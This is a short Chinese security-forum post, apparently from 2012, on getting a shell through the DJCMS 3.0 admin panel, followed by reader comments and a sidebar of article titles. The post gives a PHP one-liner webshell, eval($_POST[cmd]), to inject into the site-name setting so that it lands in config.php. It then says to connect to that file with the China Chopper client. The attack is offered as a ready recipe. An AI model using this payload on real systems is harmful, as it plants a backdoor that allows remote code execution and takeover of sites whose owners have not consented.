DJCMS 3.0后台拿shell

2012-09-13 14:51:11 11 1943 3325

进入后台在其它设置里网站名称插入以下一句话

记住提交两次

");eval($_POST[cmd])?>

然后用菜刀连接

http://www.u.com/inc/config.php

by:xch40

类别 Web安全

关于作者

194323篇文章327篇回复

评论11次

要评论？请先登录或注册

11楼

善良的拖鞋
2012-10-26 11:44

观摩一下

回复|@ta|踩(0)|顶(0)
10楼

p34ch
2012-10-26 10:21

本地测试后，后台程序就乱码了。。继续看看哪里的过滤问题。

回复|@ta|踩(0)|顶(0)
9楼

低调
2012-10-19 11:29

mark！！

回复|@ta|踩(0)|顶(0)
8楼

星天
2012-10-17 15:46

好吧我表示我的两个站都是djcms

回复|@ta|踩(0)|顶(0)
7楼

xiaobai
2012-9-14 21:12

收下了

回复|@ta|踩(0)|顶(0)
6楼

0gussi
2012-9-14 13:20

- -这样的东西就不要发了吧.....直接写入变异一句话到配置文件-_,

回复|@ta|踩(0)|顶(0)
5楼

wepeng
2012-9-13 21:15

收下、、、、、

回复|@ta|踩(0)|顶(0)
4楼

xiehou
2012-9-13 19:54

这算是提交参数的时候没有进行过滤的漏洞吗？

回复|@ta|踩(0)|顶(0)
3楼

ty4z2008
2012-9-13 19:00

和DZ很类似

回复|@ta|踩(0)|顶(0)
2楼

妖妖灵
2012-9-13 18:36

强烈支持原创

回复|@ta|踩(0)|顶(0)
1楼

istice
2012-9-13 17:40

1943 神秘小强本人？

回复|@ta|踩(0)|顶(0)

热门文章

安全资讯2024-2025 年最新网络黑客攻击技术综合报告

# 2024-2025 年最新网络黑客攻击技术综合报告## 引言随着数字化 ...

2026-01-09 04:17:52 6 2220

渗透测试记一次SEO引流后门的webshell应急响应样本分析

写在最前：由于工作性质，不写具体事件前后经过，本贴只对攻击者 ...

2026-02-02 09:31:19 35 1794

安全资讯关于个人挖矿的一个案件【T00ls法律讲堂第六十一期】

关键词行政/行政处理/虚拟货币/“挖矿”/责令整改/司法审查基本 ...

2025-12-22 16:17:04 12 2089

安全资讯Anthropic称中国AI公司利用1600万次Claude查询复制模型

Anthropic周一表示，它发现了由三家人工智能(AI)公司DeepSeek、M ...

2026-02-25 05:57:55 6 674

安全资讯霍尼韦尔关键基础设施闭路电视监控系统存在身份验证绕过漏洞

美国网络安全和基础设施安全局 (CISA) 警告称，多款霍尼韦尔闭路 ...

2026-02-20 00:43:43 6 761

精华推荐

渗透测试『代码审计』如何解密 PHP 代码

# 『代码审计』如何解密 PHP 代码---> 日期：2022-04-21>> 作者 ...

2022-04-21 09:46:14 12 747

渗透测试【Frida实战】某iOS APP逆向加密解密（含MitmProxy自动加密解密）

## 初识frida-tracefrida-trace主要用来动态跟踪函数调用，支持a ...

2023-03-11 13:48:03 13 1067

渗透测试内网渗透大杂烩

闲来无事，就想着写一篇内网渗透大杂烩的文章，之前用莲花仙子账 ...

2016-07-15 21:18:19 60 25951

逆向破解利用python免杀cs shellcode

# 利用python免杀cs shellcode## 0x01 前言老方法，拓展了一下 ...

2020-02-13 11:30:06 100 9038

渗透测试深入理解JPEG图像格式Jphide隐写

## 0x00 隐写原理 ##Jphide是基于最低有效位LSB的JPEG格式图像隐 ...

2016-05-14 22:54:20 30 14592

Top ↑